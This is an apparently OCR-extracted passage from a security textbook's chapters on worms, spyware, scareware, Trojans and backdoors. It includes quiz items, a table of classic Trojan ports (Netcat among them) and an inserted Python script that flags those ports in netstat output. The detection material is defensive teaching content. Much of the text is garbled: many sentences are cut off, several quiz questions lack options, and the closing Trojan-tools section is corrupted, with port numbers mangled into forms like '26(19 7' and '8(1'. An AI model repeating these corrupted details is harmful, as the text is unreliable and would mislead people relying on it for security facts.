Probably the most visible or dramatic feature of worms is their consumption of resources, which shows up as a side effect. Mix into this equation of speed and replication the number of computers on the Internet, and you have a situation that leads to bandwidth resources being consumed on a huge scale. Worms such as Slammer caused massive slowdowns on the Internet due to the scans it sent out looking for vulnerable systems and the way resources on infected systems were consumed as it replicated off the system, using system resources to do so.

In recent years some new characteristics have been added to the behaviors of worms, one of which is the ability to carry a payload. While traditionally worms have not directly damaged systems, worms that carry payloads can do all sorts of mischief. One of the more creative uses of worms has been to perform “cryptoviral extortion.” The worm drops off a payload that looks for specific file types (such as .doc files) and encrypts them. Once this has taken place, the worm leaves a message for the user offering to reveal the encryption key after the user pays a certain amount of money.

Stopping Worms

At the core of the worm problem is operating systems that have overlooked or unpatched vulnerabilities. Vendors such as Microsoft issues in their operating systems — including vulnerabilities that worms could use to spread. The problem becomes one of knowing patches are available for a system and applying them. This problem becomes even bigger when you realize that worms aren’t restricted just to corporate systems — they can also hit home users, who are more likely to miss patches. In some cases, patches are not yet released for a vulnerability. This leads to what is called a zero-day exploit, in which a hole can be exploited immediately.

NOTE

Several worms such as Code Red, Nimda, Blaster, and Slammer are still alive and well on the Internet today, although at levels well below their initial outbreak. These worms, some of which are nine years old, still infect systems. The main reason? System owners that have neglected to patch their systems, either out of ignorance or laziness.


NOTE

The old saying “An ounce of prevention is worth a pound of cure” applies to virus and worm prevention, as it is vastly easier to stop the problem before it starts than to try to remedy it after the fact.

The Power of Education

Much as with viruses, education is key to stopping worms. Worms are frequently spread via e-mail applications by e-mails bearing the name ILOVEYOU, for example. These prey on a user’s curiosity — the user opens the e-mail and unknowingly runs the worm in the background. Add in attacks such as phishing, which further pique a user’s curiosity, and you have a problem that only education

Antivirus and Firewalls

One of the primary lines of defense against worms is reputable antivirus and anti-spyware applications. Having an antivirus application on a system helps prevent a worm infection, but only if it is kept up to date. Modern and up-to-date antivirus applications can easily stop most worms when they appear.

Another way to stop worms is the firewall. The firewall is a valuable tool as it can block the scans to and from a system that worms use both to spread the infection and to deliver it from an infected system to other systems. Most modern operating systems such as Microsoft’s Windows 7 include this feature as part of the core system.

Spyware

Spyware is software designed to collect and report information on a user’s activities without the user’s knowledge or consent. Spyware can collect any type of information about the user that the author wishes to gather, such as:

• Browsing habits

• Keystrokes

• Software usage

• General computer usage

Spyware has been used to gather information for any reason that its author deems useful. The information collected has been used to target ads, generate revenue for the author, steal personal information, or steal data from an infected system. In some cases, spyware has gone beyond simple information collection to altering a system’s behavior to be more along the lines of the author’s wishes. Additionally, spyware has been known to act as a precursor to further attacks or infection. It can be used to download and install software


Methods of Infection

Spyware can be placed on a system by a number of different methods, each of which is effective in its own way. When the software is installed, it typically remains hidden and proceeds to carry out its task. Delivery methods for spyware include:

• Peer-to-peer networks (P2P) — This delivery mechanism has become very popular because of the increased number of individuals using these networks to obtain free software.

• Instant messaging (IM) — Delivering malicious software via IM is easy because IM software has never had much in the way of security controls.

• Internet Relay Chat (IRC) — IRC is a commonly used mechanism to deliver messages and software because of its widespread use and the ability to entice new users

• E-mail attachments — With the rise of e-mail as a communication medium, the practice of using it to distribute malware has also risen.

• Physical access — Once an attacker gains physical access, it becomes relatively easy to install the spyware and compromise the system.

• Browser defects — With many users forgetting or not choosing to update their browsers as soon as updates are released, distribution of spyware becomes easier.

can mean that you may have downloaded something nastier, such as spyware.

One of the more common ways to install software on a system is through Web browsing. When a user visits a given Web site, the spyware
Spyware installed in this manner is quite common as Web browsers lend themselves to this process — they are frequently unpatched, do not have upgrades applied, or are incorrectly configured. In most cases users do not use the most basic security precautions that come with a browser, in some cases overriding them to get a better browsing experience or to see fewer popups or prompts.

NOTE

In some articles and publications, this installation method is referred to as drive-by

In Windows Vista one of the much-maligned features was known as the UAC or User
Account Control. One thing this feature was designed to prevent is software installing or
other activity happening without a user’s knowledge. Because some users hated the change
in behavior between Vista and Windows XP, they shut off this feature to stop the nag screen.
But this also disabled protection in Internet Explorer designed to offer more security including
against spyware.


FIGURE 10-1

Installation options.

Bundling with Software

Another common way to place software on a user’s system is via installation of other software that the user intentionally installs. In these cases, a user downloads a legitimate piece of software from a Web site and then proceeds to install it. During the installation process the user is prompted to install additional software before proceeding. In most cases users believe that they can’t install the software they want without accepting it. Or they simply click the “Next” button and don’t pay attention. Other ways to get spyware on a system during installation are strategically placed checkboxes that install spyware-type applications by default. Such a dialog is shown in Figure 10-1.

You will frequently find adware in the same machines infected with spyware. Adware is software specifically designed to display ads on your system in the form of popups or nag screens. When this class of software is deployed with spyware, the effect can be quite dramatic, as you will be bombarded with ads specifically targeted to you and your search habits.

In a number of situations, adware is installed on victims’ systems because it’s been bundled with software that they wish to install. In these situations, when adware is installed it can monitor the usage of the software it was installed with or it can monitor a wide range of other activities. When a piece of adware is installed on a system, the goals can be very different from those of spyware or other types of malware. In the early days
because developers wanted to make more money from their software than they otherwise could. When such software is installed, you will typically not notice until you are presented with ads or other types of prompts.

In other cases, adware is not hidden from the user; it is much more obvious. Some developers will offer different versions of their software, one with ads and one without. Users wishing to get the software free must tolerate the annoyance of ads. Users wishing to avoid ads must pay for the privilege.

FYI

It is not unheard of for versions of software in which developers have embedded adware to be re-released by the pirate software community without the adware in place. One such example is the file sharing software Kazaa. Kazaa had a version that included spyware/adware in it as part of the normal free installation. However, this software was cracked and released without the adware in place. Of course, this raises the question: What did the pirates include?

NOTE

It is common for developers of so-called freeware to include adware as part of their product. In fact, some well-known bundles other software with it, such as browsers or other products. Most manufacturers of this type of software justify their actions as a way to provide the software free or at low cost.

Scareware

Scareware is a type of malware designed to trick victims into

Scareware generates authentic-looking popups and other ads on a system to make users think something bad has happened or will happen. For example, a common tactic is to display a popup on-screen that appears to initiate a virus scan. It inevitably locates a “virus” and then presents you with an offer to purchase software that removes it. In most cases this software is worthless or actually installs something else that performs other nasty actions, such as those connected to spyware. Users who fall for this scam typically find themselves at the very least out some amount of money — not to mention that whatever they installed may have damaged their system.

What makes this software even worse is that it frequently employs techniques that outright frighten system users. In addition to generating large numbers of bogus error messages, this class of malware may also generate real-looking dialogs such as those seen in Windows. When you click on these dialogs to close them, they may actually be installing the software.

NOTE

This type of software has become
more common over the last few
years as users have become more
savvy, and malware authors
have had to change their tactics.
Enticing users to click on realistic
dialogs and presenting real-
looking error messages can be
powerful ways to place illicit
software on a user’s system.


When executed, some scareware will go one step further, even weakening existing system security. Scareware has been known to install on a system and specifically hunt down and disable protective software such as firewalls and antiviruses. Even worse, some of this software will even prevent updates from the system vendor, meaning that security holes and defects may no longer be fixed.

Removing scareware can be a daunting task, because it disables legitimate software that protects the system. In some cases, the system may be so compromised that all Internet activity and other update systems may error out, preventing you from making any changes.

Current tactics have evolved even further to include extortion. Recent tactics have included installing software on a system that hunts for certain file types (i.e., Word documents) that it encrypts. It then offers to decrypt them only if the user pays up.

CHAPTER SUMMARY

Malware has increased in power and aggressiveness over the past few years to the point where a security professional cannot overlook or ignore the threat. Malware has taken many forms and has moved from being a simple annoyance to being criminal mischief. Software in this category has evolved dramatically to the point of being extremely malicious. Malware can now steal passwords, personal information, and plenty of other information from an unsuspecting user.

The modern concept of malware first came into being in the 1980s and 1990s. Terms such as viruses, worms, adware, scareware, and spyware have become more common in popular usage. In the past, malware was just annoying. But it has become easier to spread because of the convenient distribution channel the Internet offers, as well as the increasingly clever social engineering methods the creators of this type of software employ. Making the problem of malware even worse is the complexity of modern software, frequent lack of security, known vulnerabilities, and the lax attitude many users have toward applying security updates and patches.

New types of malware have included increasingly common scareware. Software in this
category is designed to scare you into installing the package. When you do, it takes over
the system and disables protective mechanisms or other items.


KEY CONCEPTS AND TERMS

Boot sector

Scareware

(EULA)

CHAPTER 10 ASSESSMENT

1. Viruses do not require a host program.

A. True

B. False

2. Worms are designed to replicate repeatedly.

A. True

B. False

3. ________ is designed to intimidate users.

B. Viruses

C. Scareware

D. Worms

4. Which is used to intercept user information?

B. Scareware

C. Spyware

D. Viruses

5. ________ is known to disable protective mechanisms on a system such as antiviruses, antispyware, and firewalls, and to report on a user’s activities.

B. Scareware

C. Spyware

D. A virus

6. Which of the following is a characteristic

A. Gathering information

B. Displaying popups

C. Intimidating users

D. Replicating

7. Prevention of viruses and malware includes

A. Popup blockers

B. Antivirus

C. Buffer overflows

D. All of the above

8. ________ is a powerful preventative measure to stopping viruses.

9. Which of the following can limit the impact of worms?

A. Antiviruses, firewalls, patches

B. Anti-spyware, firewalls, patches

C. Anti-wormware, firewalls, patches

D. Anti-malware

10. ________ attach(es) to files.

A. Viruses

B. Worms

D. Spyware

11. Multipartite viruses come in encrypted form.

A. True

B. False

12. ________ record(s) a user’s typing.

A. Spyware

B. Viruses

D. Malware

13. ________ are configured to go off at a certain date, time, or when a specific event occurs.

14. Scareware is harmless.

A. True

B. False

Trojans and Backdoors

ONE OF THE OLDEST and most commonly misunderstood forms of malware
is the Trojan horse or Trojan. Trojans are pieces of software that are
designed to give an attacker covert access to a victim’s system. A Trojan
is designed to be slipped onto a system quickly and stealthily to start whatever
action it is meant to perform. Trojans are small and compact. This makes them
one of the hardest types of software to detect on a system.

Trojan horses have a long history in the field of computer security. Since
they first came into existence, they have represented one of the chief threats
and dangers to users, as they can appear very attractive, enticing them to click
on and install software that grants someone else full control of their systems.
Such programs operate effectively once they have been installed, as they use
existing communication methods such as ports to transfer their information
between systems using overt channels to carry information in covert channels.

A Trojan can be defined as a program that carries something of hidden intent.
Because of their ability to hide from detection, Trojans represent one of the leading
threats to their targets’ systems. Trojans have been hidden in a diverse group of
software packages, including games, chat software, e-mail, Flash movies, and other
types of software. When a program is said to be “Trojaned,” it has been infected
or embedded with some function that is malicious in purpose.

When a Trojan is planted on a system successfully, the intent is usually to
open what is known as a backdoor. Backdoors are openings on a system that
an attacker makes to bypass normal security measures on a system. With one
of these openings in place, attackers can gain undetected, unchecked access
to a system for any purpose they intend, which is typically some sort of remote
access. This lets attackers steal information, control a system remotely, upload
files, and even use one system to attack another system.

Included in the discussion of Trojans and backdoors are what are known
as covert and overt channels. These two channels represent a mechanism for
transferring information between systems and processes in ways that are supported
and unsupported. Overt channels represent the path that data and other information
are supposed to travel over by design. As such, the paths can be properly monitored
and controlled. Covert channels are said to be in effect whenever data and other
information are transferred over mechanisms not specifically designed to carry the
information in question. Covert channels represent a free ride for attackers, as their
activities over these paths may go completely undetected.

In this chapter we will discuss the various mechanisms that an attacker can
use to gain control of, maintain control of, and transfer information to and from
a victim system.


Chapter 11 Topics

This chapter covers the following topics and concepts:

• What the significance of Trojans is
• What detection of Trojans and viruses is
• What tools for Trojans are
• What distribution methods are
• What Trojan construction kits are
• What backdoors are
• What covert communication is
• What software protection is

Chapter 11 Goals

When you complete this chapter, you will be able to:

• List common behaviors of Trojans
• List the goals of Trojans
• List the ways of detecting Trojans
• List the tools for creating Trojans
• Explain the significance of covert channels
• List the tools for removing Trojans
• List the types of Trojans
• List software protection mechanisms for Trojans
• Explain the purposes of backdoors

254 PART 2 A Technical Overview of Hacking

Significance of Trojans

Trojans are one of the oldest mechanisms used to compromise a computer system and
are still one of the more effective methods of doing so. When planned and implemented
correctly, a Trojan can grant access to a system on behalf of the attacker, allowing all
sorts of activities to take place.

Software in the Trojan category represents one of the biggest dangers to the end user
or owner of a system. Users can be easily coerced into installing or running software that
looks legitimate but hides a payload that does something unwanted, such as opening up
avenues that an attacker can use. Further complicating things is the fact that Trojans
operate on a principle that can be summed up as “permitting what you cannot deny”;
in other words, using ports and mechanisms on the system that you have to leave open
for the system to function normally, such as ports 80 and 21. These programs can even
redirect traffic in ways that they use ports that are open in place of ones that the attacker
does not wish to use.

The list of pieces of software that can be Trojaned is endless. It includes anything
that the creator believes will entice the victim to open the software. Applications such
as games, chat software, media players, screen savers, and other similar types have been
Trojaned. For example, an attacker may choose a popular downloadable game as a
By choosing a popular piece of software that people will willingly download, the attacker
increases the chances of higher infection rates.

An Unknowing Victim?

The following is an excerpt of a story that was originally published on zdnet.co.uk.

“Julian Green, 45, was taken into custody last October after police with a search warrant
raided his house. He then spent a night in a police cell, nine days in Exeter prison and three
months in a bail hostel. During this time, his ex-wife won custody of his seven-year-old
daughter and possession of his house.

This is thought to be the second case in the UK where a ‘Trojan defense’ has been used
to clear someone of such an accusation. In April, a man from Reading was found not
guilty of the crime after experts testified that a Trojan could have been responsible for
the presence of 14 child porn images on his PC.

Trojan horses can be used to install a backdoor on a PC, allowing an attacker to freely
access the computer. Using the backdoor, a malicious user can send pictures or other files
to the victim’s computer or use the infected machine to access illegal Web sites, while
hiding the intruder’s identity. Infected machines can be used for storing files without the
knowledge of the computer’s owner.”

CHAPTER 11 Trojans and Backdoors

Trojans get their name from the large wooden horse of Greek mythology that appeared at
the gates of the city of Troy. Thinking it was a gift, the Trojans brought the horse into the city.
But it only looked like a gift. Little did the Trojans know that inside the horse was hidden a small
detail of warriors who emerged at night and started the battle that destroyed the city. This story
explains the same concept that gave the Trojan form of malware its name.

A hacker may have several goals in mind when creating a Trojan, but typically it is
to maintain access for later usage. For example, an attacker may compromise a system
and install a Trojan that will leave a backdoor on the system.

Types of Trojans include:

• Remote access — Remote access Trojans (RAT) are designed to give an attacker
control over a victim’s system. Two well-known members of this class are the
SubSeven program and its cousin Back Orifice. Typically members of this class
work in two components: a client and a server.

• Data sending — Trojans of this type are designed to capture and redirect data to
an attacker. The types of data these Trojans can capture are varied but can include
anything from keystrokes and passwords to any other type of information that may
be generated or reside on the system. This information can be redirected to a hidden
file or even e-mail if there is a predefined e-mail account.

• Destructive — Software in this category is designed to do one thing and one thing
only: destroy data and kill a system.

• Denial of service (DoS) — Software in this category is designed to target a specific
service or system, overwhelm it, and shut it down.

• Proxy — Trojans that fit into this category allow attackers to use a victim’s system
to perform their own activities. Using a victim’s system to carry out a crime makes
locating the actual perpetrator much more difficult.

• FTP — Software in this category is designed to set up the infected system as an FTP
server. An infected system will become a server hosting all sorts of data including
illegal software, pirated movies and music or, as has been observed in some cases,
pornography.

• Security software disablers — Trojans of this type are designed to specifically target
the security countermeasures present on a system and shut them down. On a system
infected with this software, mechanisms such as antivirus, firewall, and system
updates are often disabled. Trojans often use this strategy first to infect a system
and then perform activities from one of the other categories, such as setting up
a proxy server or FTP site.


One Use of a Trojan

The following story appeared in 2002 and shows how a Trojan can be used, in this case
by law enforcement, for legitimate reasons.

“Feds Out-Hack Russian Hackers”

With the help of some new computer spying software, FBI agents were able to out-hack
a pair of Russian hackers who had stolen thousands of credit card numbers to make
purchases on Ebay and then defraud PayPal, the leading online bill payer.

The challenge, said Assistant U.S. Attorney Floyd Short, was that the suspects, Alexei
Ivanov and Vasily Gorshkov, were Russians. And their server — where Short says they kept
thousands of stolen credit card numbers — was also in Russia.

The game — which was successful — was for authorities in Seattle, Wash., to steal the
passwords and codes to the Russians’ server in Russia.

“Gorshkov went on the Internet,” said Floyd. “We obtained the name of the server
in Russia, his user name and his password…. It was critical to the case.”

How exactly did the FBI record an encrypted password and codes? It was with a $100 piece of software invented by Richard Eaton of Kennewick, Wash. Eaton’s program, WinWhatWhere Investigator, has revolutionized computer snooping with what’s called keystroke logging. The software secretly records everything a user types, coded or not, and sends a report to a third party who is spying on the user. “The Russians just sat down and entered their passwords. It couldn’t have been any better than that,” said Eaton. . .

Computer Trojans emerged in the mid-1980s as a way to infect software and distribute the infected payload to different systems without raising suspicion. In most situations, but not all, Trojans are intended to allow an attacker to remotely access or control a victim’s system. In the event an application that is infected with a Trojan is installed on a target system, the attacker can not only obtain remote access, but also perform other operations designed to gain control of the infected system. In fact the operations that an attacker can perform are limited by only two factors: the privileges of the user account it is running under and the design the author has chosen to implement. By infecting a system with a Trojan, an attacker opens up a backdoor to the system that he or she can take advantage of.

Methods to Get Trojans onto a System

Hackers have a range of options, from high-tech to low, for getting Trojans onto their victims’ computers. A common theme among these methods is that they play on the human desire to get something for nothing. Here are the common methods for installing a Trojan:

• Peer-to-peer networks (P2P) — This delivery mechanism has become very popular due to the increased number of individuals using these networks to obtain software free of charge. An attacker can easily grab a legitimate piece of software, embed a Trojan in it, post it on a file-sharing network, and wait for victims to download it.
• Instant messaging (IM) — Delivering malicious software via IM has been very common, as it is easy and IM software has never had much in the way of security controls.
• Internet Relay Chat (IRC) — IRC is a mechanism commonly used to deliver messages and software due to its widespread use and its ability to entice new users to download software.
• E-mail attachments — With the rise of e-mail as a communication medium, the practice of using it to distribute Trojans also rose. Trojans have been distributed in this medium as attachments and as clickable links.
• Physical access — Decidedly low tech but no less effective is physical access to a system. Once an attacker gains physical access, it becomes relatively easy to install the Trojan and compromise the system.
• Browser defects — With many users forgetting to or choosing not to update their browsers as soon as updates are released, distribution of Trojans becomes easier. Since Web browsers are designed by their very nature to treat content that they are sent as trusted, this allows malicious programs to run unabated.
• Freeware — You don’t get something for nothing, and thinking you are getting free software can lead to disaster. Downloading software for no charge from unknown or untrusted sources can mean that you may have downloaded something nastier, such as a Trojan-infested application.

Operations that could be performed by a hacker on a target computer system include:

• Data theft
• Installation of software
• Downloading or uploading of files
• Modification of files
• Installing key loggers
• Viewing the system user’s screen
• Consuming computer storage space
• Crashing the victim’s system

Trojans are commonly grouped into the same category as viruses, but this is not entirely correct. Trojans are similar in certain ways to viruses in that they attach to other files which they use as a carrier, but they are different in the fact that they are not designed to replicate.

The method of distribution that is used for Trojans is simple in that they attach themselves to another file and the file is retrieved and executed by an unsuspecting victim. Once this event occurs, the Trojan typically grants access to the attacker or can do some other action on the attacker’s behalf.

Trojans require instructions from the hacker to fully realize their purpose before or after distribution. In fact it has been shown in the majority of cases that Trojans are not actually distributed past the initial stages by their creators. Once attackers release their code into the world, they switch their involvement from the distribution to the listening phase, where Trojans will call home, indicating they have infected a system and may be awaiting instructions.

Targets of Trojans

The more we all use the Internet to communicate, shop, and even store our stuff, the more we generate targets for hackers and their Trojan horses. Here are some of the targets that tempt hackers:

• Credit card data — Credit card data and personal information is a tempting and all too common target. Upon obtaining this information an attacker can embark on a shopping spree purchasing any type of product or service they desire, such as Web services, games, or other products.
• Passwords — Passwords are always an attractive target for attackers. If they obtain this sort of information, it can prove devastating to the victim. Since most individuals will reuse passwords over and over again, getting one password from an individual can easily open many doors. And using a Trojan to obtain passwords can mean that a hacker can read passwords from a system that include everything from e-mail and Internet accounts to banking passwords.
• Insider information — Confidential or insider information is another target for an attacker. An attacker may very well use a Trojan to gain information from an organization that may not otherwise be public.
• Data storage — In some cases a system that becomes the unlucky recipient of a Trojan may find itself a point for storing data without the owner’s knowledge. Uploading data to an infected system can turn that system into a server that can host any type of content. Infected hosts have been known to include illegal music or movies, pirated software, pornography, financial data, or even child pornography.
• Random acts of mischief — In some cases the intention may be just to irritate or annoy the system owner. The hacker may simply want to have some fun at the victim’s expense.

NOTE: Trojans rely on the fact that they look like something the user wants, such as a game or piece of free software. When users install or run this software they run the main program, but unbeknown to them, the Trojan is running in the background.

The first widespread Trojans to appear debuted between 1994 and 1998 as distribution methods became more robust (think Internet). Prior to this point the software was distributed via bulletin board systems (BBSs), floppies, and similar methods. Since the early days of Trojans the sophistication of the software has increased, as has the number of reported incidents associated with this type of code. Of course as Trojans increased in sophistication, so did the methods used to thwart them, such as antivirus software and other tools.

Known Symptoms of an Infection

So what are the symptoms or effects of an infection of a Trojan? In the event that your antivirus does not detect and eliminate this type of software, it helps to be able to identify some of the signs of a Trojan infection:

• The CD drawer of a computer opens and closes.
• The computer screen changes, as by flipping or inverting.
• Screen settings change by themselves.
• Documents print with no explanation.
• The browser is redirected to a strange or unknown Web page.
• Windows color settings change.
• Screen saver settings change.
• Right and left mouse buttons reverse their functions.
• The mouse pointer disappears.
• The mouse pointer moves in unexplained ways.
• The start button disappears.
• Chat boxes appear on the infected system.
• The Internet Service Provider (ISP) reports that the victim’s computer is running port scans.
• People chatting appear to know detailed personal information.
• The system shuts down by itself.
• The task bar disappears.
• The account passwords are changed.
• Legitimate accounts are accessed without authorization.
• Unknown purchase statements appear in credit card bills.
• Modems dial and connect to the Internet by themselves.
• Ctrl+Alt+Del stops working.
• While the computer is rebooted, a message states that there are other users still connected.

Detection of Trojans and Viruses

There are several methods of detecting if a Trojan is present on a system, but few prove more useful to the security professional than looking at ports, so let’s go back to a topic that was discussed in a previous chapter. If Trojans are going to give an attacker the ability to attach to a system remotely, they are going to need to attach to the system through the use of a port. Some Trojans use well known ports that can be easily detected; others may use nonstandard or obscure ports that will need a little extra investigation to determine what is listening (whether it is a legitimate service or something else). Table 11-1 lists some of the common ports that are used for some classic Trojans.

TABLE 11-1 Some classic Trojans and the ports and protocols they use.

TROJAN               PROTOCOL                                   PORTS
Back Orifice         UDP                                        31337 or 31338
Back Orifice 2000    TCP/UDP                                    54320/54321
Beast                TCP                                        6666
Citrix ICA           TCP/UDP                                    1494
Deep Throat          UDP                                        2140 and 3150
Desktop Control      UDP                                        NA
Donald Dick          TCP                                        23476/23477
Loki                 ICMP (Internet Control Message Protocol)   NA
NetBus               TCP                                        12345 and 12346
Netcat               TCP/UDP                                    Any
NetMeeting Remote    TCP                                        49608/49609
pcAnywhere           TCP                                        5631/5632/65301
Reachout             TCP                                        43188
Remotely Anywhere    TCP                                        2000/2001
Remote               TCP/UDP                                    135-1139
Whack-a-mole         TCP                                        12361 and 12362
NetBus 2 Pro         TCP                                        20034
Girl Friend          TCP                                        21544
Masters Paradise     TCP                                        3129, 40421, 40422, 40423 and 40426
Timbuktu             TCP/UDP                                    407
VNC                  TCP/UDP                                    5800/5801

FIGURE 11-1 Results of the netstat command.

Of the tools for detecting Trojans, one of the easiest to access would be the command line tool known as netstat. Using netstat it is possible to list the ports that are listening on a system and browse each to see what is supposed to be running on each. In Windows at the command line you can type the following command:

netstat -an

This command will display the results shown in Figure 11-1. Another tool that could help you locate the ports that a Trojan is listening for instructions on is nmap. With nmap you can scan a system and get a report back on the ports that are listening and investigate further to see if any unusual activity is afoot.

Vulnerability Scanners

Providing an additional tool is the use of a category of software known as the vulnerability scanner. Software of this type can be used to scan a system, locate, and report back on services such as Trojans listening on the ports of a system. One of the best known scanners of this type is the tool known as Nessus.

Antivirus

One of the best and most reliable methods of detecting Trojans, viruses, and worms is the use of the ubiquitous antivirus software. Software of this type is used to scan for the behaviors and signatures of these types of code and in turn remove and/or quarantine them on the system.
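As an added example (not a tool from the book), the following Python script carries out the port-based check described above: it parses Windows-style netstat -an output, flags sockets whose local port appears in Table 11-1, and also lists listeners that are missing from a baseline of expected services, since a Trojan moved to an obscure port will never match a port table. The sample netstat output and the baseline are constructed for the demonstration.

```python
"""Added example: check Windows-style 'netstat -an' output against Table 11-1.
A port match is only a lead, never proof: legitimate services can share a port
and Trojans can be reconfigured, so a baseline check of all listeners is done too."""
import re

# (protocol, port) -> (name, category), from Table 11-1. Rows with port "Any"
# (Netcat) or "NA" (Desktop Control, Loki over ICMP) cannot be matched on a port.
KNOWN_PORTS = {}

def _add(name, category, protos, ports):
    for proto in protos:
        for port in ports:
            KNOWN_PORTS[(proto, port)] = (name, category)

_add("Back Orifice", "trojan", ("udp",), (31337, 31338))
_add("Back Orifice 2000", "trojan", ("tcp", "udp"), (54320, 54321))
_add("Beast", "trojan", ("tcp",), (6666,))
_add("Deep Throat", "trojan", ("udp",), (2140, 3150))
_add("Donald Dick", "trojan", ("tcp",), (23476, 23477))
_add("NetBus", "trojan", ("tcp",), (12345, 12346))
_add("NetBus 2 Pro", "trojan", ("tcp",), (20034,))
_add("Whack-a-mole", "trojan", ("tcp",), (12361, 12362))
_add("Girl Friend", "trojan", ("tcp",), (21544,))
_add("Masters Paradise", "trojan", ("tcp",), (3129, 40421, 40422, 40423, 40426))
# Remote-administration products from the table: legitimate when authorized,
# so they get a softer label but still need confirming against the inventory.
_add("Citrix ICA", "remote admin", ("tcp", "udp"), (1494,))
_add("NetMeeting Remote", "remote admin", ("tcp",), (49608, 49609))
_add("pcAnywhere", "remote admin", ("tcp",), (5631, 5632, 65301))
_add("Reachout", "remote admin", ("tcp",), (43188,))
_add("Remotely Anywhere", "remote admin", ("tcp",), (2000, 2001))
_add("Timbuktu", "remote admin", ("tcp", "udp"), (407,))
_add("VNC", "remote admin", ("tcp", "udp"), (5800, 5801))

# One socket line: "TCP  0.0.0.0:135  0.0.0.0:0  LISTENING" or "UDP  0.0.0.0:137  *:*"
_SOCKET_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+(\S+))?\s*$", re.I)

def parse_netstat(output):
    """Return (proto, local_ip, local_port, state) per socket line; other lines
    are skipped. The port is split at the last colon so "[::]:445" parses too."""
    records = []
    for line in output.splitlines():
        m = _SOCKET_RE.match(line)
        if not m:
            continue
        proto, local, _foreign, state = m.groups()
        ip, _, port = local.rpartition(":")
        if port.isdigit():
            records.append((proto.lower(), ip, int(port), (state or "").upper()))
    return records

def is_listening(proto, state):
    # netstat prints no state for UDP; a bound UDP socket is a listener.
    return proto == "udp" or state == "LISTENING"

def flag_known_ports(output):
    """Sockets whose local port is in Table 11-1, listening or already in use."""
    hits = []
    for proto, ip, port, state in parse_netstat(output):
        known = KNOWN_PORTS.get((proto, port))
        if known and (is_listening(proto, state) or state == "ESTABLISHED"):
            hits.append({"proto": proto, "port": port, "local": ip,
                         "state": state or "BOUND",
                         "name": known[0], "category": known[1]})
    return hits

def unexpected_listeners(output, baseline):
    """Listening (proto, port) pairs absent from the expected-services baseline:
    the "browse each port to see what should be running" step, which also
    catches a Trojan moved to an obscure port that no port table would match."""
    found = set()
    for proto, _ip, port, state in parse_netstat(output):
        if is_listening(proto, state) and (proto, port) not in baseline:
            found.add((proto, port))
    return sorted(found)

# Constructed sample of 'netstat -an' on a Windows host (not a real capture).
SAMPLE_NETSTAT = """
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    192.168.1.20:12345     203.0.113.7:50212      ESTABLISHED
  TCP    0.0.0.0:5800           0.0.0.0:0              LISTENING
  TCP    [::]:445               [::]:0                 LISTENING
  TCP    0.0.0.0:47000          0.0.0.0:0              LISTENING
  UDP    0.0.0.0:137            *:*
  UDP    0.0.0.0:31337          *:*
"""
# Constructed baseline of the services this host is expected to expose.
BASELINE = {("tcp", 135), ("tcp", 445), ("udp", 137)}

if __name__ == "__main__":
    for h in flag_known_ports(SAMPLE_NETSTAT):
        print(f"{h['proto']}/{h['port']:<5} {h['state']:<11} {h['category']}: {h['name']}")
    for proto, port in unexpected_listeners(SAMPLE_NETSTAT, BASELINE):
        print(f"unexpected listener: {proto}/{port}")
```

On the sample the NetBus port shows up both listening and with an established session from 203.0.113.7, the VNC port is reported as a remote-admin tool to confirm, and tcp/47000 is caught only by the baseline check.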
Antivirus 262 PART 2 A Technics I Overview of Hacking Trojan Tools There exist a wide range of tools used to take control of a victim’s system and leave behind a -l present” for I hem in the farm of a backdoor. We will not tit tempt to cover all these tools, but for reference the following list includes some of the more common ones that have been found in the wild. Note that this is not an exhtiustive list and there Eire newer variants in existence: Let me rule — A remote access Trojan authored entirely in Delphi; uses TCP port 26(19 7 by default • RECUS — Remoted Encrypted Callback UNIX Backdoor (RECIIB) borrows its name from the UNIX world. This product features RC4 encryption, code injection, and encrypted ICMP communication request. Demonstrates a key trait of Trojan software, small size, as it tips the scale at less than 6 KB. • Phatbot — Capable of stealing personal information including e-mail addresses, credit card numbers, and software licensing codes. Returns this information • to the attacker or requestor using a peer-to-peer (P2P) network. Phatbot also has the ability to terminate many antivirus and software- based firewall products leaving the victim open to secondary attacks. Am it is — Opens up TCP port 275 51 to give the hacker complete control of the victim’s computer. Zombam.B Allows the attacker to use a Web browser to infect a computer. Uses port 8(1 by default, created with a Trojan generation tool known as HTTPRat. Much like Phatbot, it also attempts to terminate various antivirus and firewall processes, ■ Beast — Uses a technique known as DDL (Data Definition Language) injection. Using this technique the Trojan injects itself into an existing process, effectively hiding itself from process viewers. It is harder to detect and harder to eradicate, • Hard disk killer — A Trojan written to destroy a system’s hard drive. When executed it will Eittack a system’s hard drive and wipe the hEird drive in just a few seconds. 
Going back to something that was discussed in a previous chapter known as the NULL session, this is something we can use to place a Trojan, As you read, the NULL session is a feature of Windows that allows connections under the guise of the anonymous user. With this NULL session a connection can be made to enumerate shares and services on the system for whatever goat the attacker may have, which can be, in this chapter, to install a Trojan. Using a NULL session we will install one of the oldest and most powerful tools for gaining access to systems or performing remote [ulmin titration, Back Orifice (E02K) can be placed on a victim’s system to give the attacker the ability to perform a diverse range of attacks, NOTE Back Orifice is an older Trojan tool that is stopped by any of the major antivirus applications that are in circulation today. CHAPTER 11 Trojans and Backdoors 263 The manufacturer of Buck Oriiice says this about B02K: NOTE “Built upon the phenomenal success of Back Orifice released in August 98, B02K puts network Eidminislrators solidly Back Orifice is billed by the manufacturer as a remote administrator tool, but others will call it a Trojan instead. We will not address or attempt to settle this argument here, but we will treat the tool as a Trojan as it exhibits the behaviors associated with this class of software. back in control. In control of the system, network, registry. passwords, file system, and processes. B02K is a lot like other major file-synchronization and remote control packages that are on the market as commercial products. Except that B02K is smaller, faster, free, and very, very extensible. With the help of the open -source development community, B02K will grow even more powerful. 
